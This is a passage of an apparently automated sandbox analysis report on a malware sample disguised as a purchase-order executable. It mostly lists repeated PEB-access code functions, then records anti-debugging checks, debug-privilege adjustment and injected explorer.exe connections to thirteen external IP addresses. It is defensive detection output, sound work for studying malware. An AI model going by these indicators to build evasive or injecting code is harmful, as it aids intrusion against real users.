          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2B260 mov eax, dword ptr fs:[00000030h]5_2_02F2B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48A62 mov eax, dword ptr fs:[00000030h]5_2_02F48A62
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3EA55 mov eax, dword ptr fs:[00000030h]5_2_02F3EA55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]5_2_02E79240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]5_2_02E79240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]5_2_02E79240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79240 mov eax, dword ptr fs:[00000030h]5_2_02E79240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F04257 mov eax, dword ptr fs:[00000030h]5_2_02F04257
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]5_2_02E9A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]5_2_02E9A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]5_2_02E9A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]5_2_02E9A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]5_2_02E9A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]5_2_02E9A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]5_2_02E9A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]5_2_02E9A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9A229 mov eax, dword ptr fs:[00000030h]5_2_02E9A229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h]5_2_02EB4A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB4A2C mov eax, dword ptr fs:[00000030h]5_2_02EB4A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E88A0A mov eax, dword ptr fs:[00000030h]5_2_02E88A0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h]5_2_02F3AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AA16 mov eax, dword ptr fs:[00000030h]5_2_02F3AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h]5_2_02E7AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7AA16 mov eax, dword ptr fs:[00000030h]5_2_02E7AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E93A1C mov eax, dword ptr fs:[00000030h]5_2_02E93A1C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]5_2_02E75210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov ecx, dword ptr fs:[00000030h]5_2_02E75210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]5_2_02E75210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E75210 mov eax, dword ptr fs:[00000030h]5_2_02E75210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9DBE9 mov eax, dword ptr fs:[00000030h]5_2_02E9DBE9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]5_2_02EA03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]5_2_02EA03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]5_2_02EA03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]5_2_02EA03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]5_2_02EA03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA03E2 mov eax, dword ptr fs:[00000030h]5_2_02EA03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h]5_2_02EF53CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF53CA mov eax, dword ptr fs:[00000030h]5_2_02EF53CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]5_2_02EA4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]5_2_02EA4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA4BAD mov eax, dword ptr fs:[00000030h]5_2_02EA4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F45BA5 mov eax, dword ptr fs:[00000030h]5_2_02F45BA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h]5_2_02E81B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E81B8F mov eax, dword ptr fs:[00000030h]5_2_02E81B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2D380 mov ecx, dword ptr fs:[00000030h]5_2_02F2D380
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3138A mov eax, dword ptr fs:[00000030h]5_2_02F3138A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAB390 mov eax, dword ptr fs:[00000030h]5_2_02EAB390
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2397 mov eax, dword ptr fs:[00000030h]5_2_02EA2397
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7DB60 mov ecx, dword ptr fs:[00000030h]5_2_02E7DB60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h]5_2_02EA3B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA3B7A mov eax, dword ptr fs:[00000030h]5_2_02EA3B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7DB40 mov eax, dword ptr fs:[00000030h]5_2_02E7DB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48B58 mov eax, dword ptr fs:[00000030h]5_2_02F48B58
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7F358 mov eax, dword ptr fs:[00000030h]5_2_02E7F358
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3131B mov eax, dword ptr fs:[00000030h]5_2_02F3131B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]5_2_02E740E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]5_2_02E740E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E740E1 mov eax, dword ptr fs:[00000030h]5_2_02E740E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E758EC mov eax, dword ptr fs:[00000030h]5_2_02E758EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]5_2_02F0B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov ecx, dword ptr fs:[00000030h]5_2_02F0B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]5_2_02F0B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]5_2_02F0B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]5_2_02F0B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0B8D0 mov eax, dword ptr fs:[00000030h]5_2_02F0B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB90AF mov eax, dword ptr fs:[00000030h]5_2_02EB90AF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]5_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]5_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]5_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]5_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]5_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA20A0 mov eax, dword ptr fs:[00000030h]5_2_02EA20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAF0BF mov ecx, dword ptr fs:[00000030h]5_2_02EAF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h]5_2_02EAF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAF0BF mov eax, dword ptr fs:[00000030h]5_2_02EAF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79080 mov eax, dword ptr fs:[00000030h]5_2_02E79080
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h]5_2_02EF3884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF3884 mov eax, dword ptr fs:[00000030h]5_2_02EF3884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F32073 mov eax, dword ptr fs:[00000030h]5_2_02F32073
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F41074 mov eax, dword ptr fs:[00000030h]5_2_02F41074
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h]5_2_02E90050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E90050 mov eax, dword ptr fs:[00000030h]5_2_02E90050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]5_2_02E8B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]5_2_02E8B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]5_2_02E8B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8B02A mov eax, dword ptr fs:[00000030h]5_2_02E8B02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]5_2_02EA002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]5_2_02EA002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]5_2_02EA002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]5_2_02EA002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA002D mov eax, dword ptr fs:[00000030h]5_2_02EA002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h]5_2_02F44015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F44015 mov eax, dword ptr fs:[00000030h]5_2_02F44015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]5_2_02EF7016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]5_2_02EF7016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7016 mov eax, dword ptr fs:[00000030h]5_2_02EF7016
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]5_2_02E7B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]5_2_02E7B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B1E1 mov eax, dword ptr fs:[00000030h]5_2_02E7B1E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F041E8 mov eax, dword ptr fs:[00000030h]5_2_02F041E8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF69A6 mov eax, dword ptr fs:[00000030h]5_2_02EF69A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h]5_2_02EA61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA61A0 mov eax, dword ptr fs:[00000030h]5_2_02EA61A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]5_2_02EF51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]5_2_02EF51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]5_2_02EF51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF51BE mov eax, dword ptr fs:[00000030h]5_2_02EF51BE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]5_2_02F349A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]5_2_02F349A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]5_2_02F349A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F349A4 mov eax, dword ptr fs:[00000030h]5_2_02F349A4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9C182 mov eax, dword ptr fs:[00000030h]5_2_02E9C182
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA185 mov eax, dword ptr fs:[00000030h]5_2_02EAA185
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA2990 mov eax, dword ptr fs:[00000030h]5_2_02EA2990
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C962 mov eax, dword ptr fs:[00000030h]5_2_02E7C962
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h]5_2_02E7B171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7B171 mov eax, dword ptr fs:[00000030h]5_2_02E7B171
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h]5_2_02E9B944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9B944 mov eax, dword ptr fs:[00000030h]5_2_02E9B944
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]5_2_02E94120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]5_2_02E94120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]5_2_02E94120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov eax, dword ptr fs:[00000030h]5_2_02E94120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E94120 mov ecx, dword ptr fs:[00000030h]5_2_02E94120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h]5_2_02EA513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA513A mov eax, dword ptr fs:[00000030h]5_2_02EA513A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]5_2_02E79100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]5_2_02E79100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E79100 mov eax, dword ptr fs:[00000030h]5_2_02E79100
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA16E0 mov ecx, dword ptr fs:[00000030h]5_2_02EA16E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E876E2 mov eax, dword ptr fs:[00000030h]5_2_02E876E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48ED6 mov eax, dword ptr fs:[00000030h]5_2_02F48ED6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA36CC mov eax, dword ptr fs:[00000030h]5_2_02EA36CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB8EC7 mov eax, dword ptr fs:[00000030h]5_2_02EB8EC7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2FEC0 mov eax, dword ptr fs:[00000030h]5_2_02F2FEC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF46A7 mov eax, dword ptr fs:[00000030h]5_2_02EF46A7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]5_2_02F40EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]5_2_02F40EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F40EA5 mov eax, dword ptr fs:[00000030h]5_2_02F40EA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0FE87 mov eax, dword ptr fs:[00000030h]5_2_02F0FE87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8766D mov eax, dword ptr fs:[00000030h]5_2_02E8766D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]5_2_02E9AE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]5_2_02E9AE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]5_2_02E9AE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]5_2_02E9AE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9AE73 mov eax, dword ptr fs:[00000030h]5_2_02E9AE73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]5_2_02E87E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]5_2_02E87E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]5_2_02E87E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]5_2_02E87E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]5_2_02E87E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E87E41 mov eax, dword ptr fs:[00000030h]5_2_02E87E41
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h]5_2_02F3AE44
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F3AE44 mov eax, dword ptr fs:[00000030h]5_2_02F3AE44
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7E620 mov eax, dword ptr fs:[00000030h]5_2_02E7E620
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F2FE3F mov eax, dword ptr fs:[00000030h]5_2_02F2FE3F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]5_2_02E7C600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]5_2_02E7C600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E7C600 mov eax, dword ptr fs:[00000030h]5_2_02E7C600
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EA8E00 mov eax, dword ptr fs:[00000030h]5_2_02EA8E00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h]5_2_02EAA61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA61C mov eax, dword ptr fs:[00000030h]5_2_02EAA61C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F31608 mov eax, dword ptr fs:[00000030h]5_2_02F31608
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EB37F5 mov eax, dword ptr fs:[00000030h]5_2_02EB37F5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]5_2_02EF7794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]5_2_02EF7794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF7794 mov eax, dword ptr fs:[00000030h]5_2_02EF7794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E88794 mov eax, dword ptr fs:[00000030h]5_2_02E88794
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8FF60 mov eax, dword ptr fs:[00000030h]5_2_02E8FF60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48F6A mov eax, dword ptr fs:[00000030h]5_2_02F48F6A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8EF40 mov eax, dword ptr fs:[00000030h]5_2_02E8EF40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h]5_2_02E74F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E74F2E mov eax, dword ptr fs:[00000030h]5_2_02E74F2E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAE730 mov eax, dword ptr fs:[00000030h]5_2_02EAE730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h]5_2_02F0FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0FF10 mov eax, dword ptr fs:[00000030h]5_2_02F0FF10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h]5_2_02EAA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA70E mov eax, dword ptr fs:[00000030h]5_2_02EAA70E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h]5_2_02F4070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F4070D mov eax, dword ptr fs:[00000030h]5_2_02F4070D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9F716 mov eax, dword ptr fs:[00000030h]5_2_02E9F716
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F314FB mov eax, dword ptr fs:[00000030h]5_2_02F314FB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]5_2_02EF6CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]5_2_02EF6CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6CF0 mov eax, dword ptr fs:[00000030h]5_2_02EF6CF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F48CD6 mov eax, dword ptr fs:[00000030h]5_2_02F48CD6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E8849B mov eax, dword ptr fs:[00000030h]5_2_02E8849B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02E9746D mov eax, dword ptr fs:[00000030h]5_2_02E9746D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h]5_2_02F0C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02F0C450 mov eax, dword ptr fs:[00000030h]5_2_02F0C450
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EAA44B mov eax, dword ptr fs:[00000030h]5_2_02EAA44B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EABC2C mov eax, dword ptr fs:[00000030h]5_2_02EABC2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]5_2_02EF6C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]5_2_02EF6C0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_02EF6C0A mov eax, dword ptr fs:[00000030h]5_2_02EF6C0A
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013ED6DE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_013ED6DE
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E605C SetUnhandledExceptionFilter,0_2_013E605C
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013E032D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_013E032D
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 0_2_013DD3A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_013DD3A1

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.35.122.226 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.201.11.126 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.134.22.63 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.182.242 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.253.79.71 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 52.71.133.130 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.12.202.18 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.86.218.70 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 13.226.173.80 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
